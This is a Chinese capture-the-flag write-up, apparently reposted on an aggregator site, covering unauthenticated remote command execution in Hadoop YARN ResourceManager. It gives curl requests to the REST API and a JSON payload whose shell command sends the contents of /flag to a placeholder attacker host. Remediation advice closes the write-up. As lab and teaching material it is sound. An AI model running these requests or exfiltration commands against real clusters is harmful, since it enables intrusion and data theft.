当前位置: 首页 > news >正文

玄机网络安全靶场:Hadoop YARN ResourceManager 未授权 RCE WP

解题报告:Hadoop YARN ResourceManager 未授权 RCE

题目名称:Hadoop YARN ResourceManager(Unauthorized)
难度:简单
分类:渗透
Flagflag{41d1290e-e2d2-4028-85ce-43909a1787c4}


漏洞背景

Hadoop YARN(Yet Another Resource Negotiator)是 Apache Hadoop 的集群资源管理系统。YARN ResourceManager 提供了一套 REST API 用于集群管理,默认情况下该 API无需任何认证即可访问。攻击者可以通过以下步骤在集群节点上执行任意命令:

  1. 调用POST /ws/v1/cluster/apps/new-application创建新的 Application ID
  2. 调用POST /ws/v1/cluster/apps提交包含恶意命令的 Application
  3. YARN 的 NodeManager 会在容器中执行该命令

靶机信息

项目
靶机 IP43.192.45.210
服务端口8088(YARN ResourceManager Web UI)
服务版本Hadoop YARN(Jetty 6.1.26)
目标文件/flag

利用过程

第一步:确认服务连通性

curl-vhttp://43.192.45.210:8088/# 返回 HTTP 302 → /cluster,确认 YARN 服务正常运行

第二步:获取新 Application ID

curl-s-XPOST"http://43.192.45.210:8088/ws/v1/cluster/apps/new-application"\-H"Content-Type: application/json"# 返回:{"application-id":"application_1776602744486_0011",...}

第三步:提交恶意 Application

通过 Python 构造 JSON payload,命令使用/bin/sh -c执行,将/flag内容通过 curl 外带到攻击者服务器:

command='/bin/sh -c \'curl -sk "https://ATTACKER/?r=$(cat /flag 2>&1 | tr -d \'\\n\')"\''payload={"application-id":app_id,"application-name":"exploit","am-container-spec":{"commands":{"command":command}},"application-type":"YARN","unmanaged-AM":False,"max-app-attempts":1,"resource":{"memory":1024,"vCores":1},...}

第四步:接收外带数据

在攻击者服务器上启动 HTTP 服务,收到请求:

GET /flag1?r=flag41d1290e-e2d2-4028-85ce-43909a1787c4 HTTP/1.1

Flag:flag{41d1290e-e2d2-4028-85ce-43909a1787c4}


关键技术点

技术点说明
无认证 REST APIYARN ResourceManager 默认不需要认证
Application 提交通过 REST API 提交包含任意命令的 Application
命令执行环境NodeManager 容器中以 hadoop 用户执行
外带方式靶机可以访问外网,用 curl 将结果发送到攻击者服务器
base64 问题靶机环境base64 -w 0不支持,改用tr -d '\n'去除换行

修复建议

  1. 为 YARN ResourceManager REST API 启用 Kerberos 认证
  2. 配置防火墙,限制 8088 端口只允许内网访问
  3. 启用 YARN 的 ACL(Access Control List)功能
  4. 升级到支持认证的 Hadoop 版本并正确配置安全模式

http://www.jsqmd.com/news/719487/

相关文章:

  • 【教训总结】2026年5月天梭官方售后网点核验报告:踩坑实录与避坑指南 - 亨得利官方服务中心
  • 学 Simulink——基于 Simulink 的 LCL 滤波器谐振抑制与有源阻尼设计
  • AI开发-python-langchain框架(--常用的几种文本分割 )
  • 2026年西藏装配式建筑产业基地与拉萨轻质混凝土墙板完全选购指南 - 优质企业观察收录
  • 把2012款Mac Mini改造成家庭影音中心:Monterey系统下的播放器、音量调节与远程管理配置
  • 2026最新手板复模厂家/源头工厂/工厂推荐!广东优质智造榜单发布,实力靠谱深圳手板复模厂商精选 - 十大品牌榜
  • 大模型评估实战:从指标设计到企业级落地
  • 【横评】2026年5月帝舵官方售后网点核验报告:亲历踩坑实录与防坑指南 - 亨得利官方服务中心
  • 别再折腾ST-Link了!用Proteus仿真STM32调试HAL库代码,效率提升不止一倍
  • 告别‘夜盲症’:用PyTorch复现这篇极低光去噪论文(附代码与SE模块详解)
  • 【老司机分享】2026年5月劳力士官方售后网点核验报告:踩坑实录与防坑指南 - 亨得利官方服务中心
  • STM32F103驱动0.96寸OLED:模拟IIC vs 硬件IIC,到底该选哪个?
  • 2026 年甘肃省【彩砖 / 渗水砖 / PC 砖 / 道牙砖 / 六角砖】生产厂家 TOP5 推荐(全省供货・西北配送) - 深度智识库
  • 边缘计算时序模型选型与工业应用实战
  • 【大白话说Java面试题】【Java基础篇】第19题:HashMap的key如何减少发生哈希冲突
  • 从VCU到MCU:一份给新能源汽车三电工程师的HiL测试避坑指南(含BMS故障注入实战)
  • 不只是跑包:用EWSA Pro中文版做一次完整的家庭Wi-Fi安全自检(附防破解建议)
  • 2026年4月北京灭蟑螂/灭老鼠/除蟑螂/除老鼠/消杀公司解析,认准北京祥尔生物科技有限公司 - 2026年企业推荐榜
  • 终极指南:如何用OmenSuperHub完全掌控暗影精灵风扇与性能
  • 厂房无尘室洁净室工程必看!设计施工一体化承包与改造扩建核心要点 - 品牌2026
  • 树莓派miniDLNA服务配置详解:从/media目录权限到外挂NTFS硬盘的避坑全记录
  • 2026最新汽车配件复模厂家/企业/工厂推荐!广东优质权威榜单发布,实力靠谱深圳等地供应商精选 - 十大品牌榜
  • 如何高效构建植物病害检测模型:PlantDoc数据集实战指南
  • 找专做管道安装工程的公司看这里,厂房设计施工一体化承包商怎么选 - 品牌2026
  • 从QWidget到QMainWindow:PyQt5项目升级踩坑实录与完整迁移指南
  • 机器学习工程师必备的七项统计核心能力
  • Obsidian插件汉化终极指南:3分钟让英文插件变中文界面
  • 2026年混凝土膨胀剂厂家口碑推荐:补偿收缩型/抗渗型/低碱型,实力品牌深度解析 - 深度智识库
  • “论文是什么鬼东西?”——本科生的第一堂写作课,该从哪里开始?
  • 敏肌专用防晒淡晒斑温和不黏腻,晒斑不翻车!这瓶防晒闭眼入 - 全网最美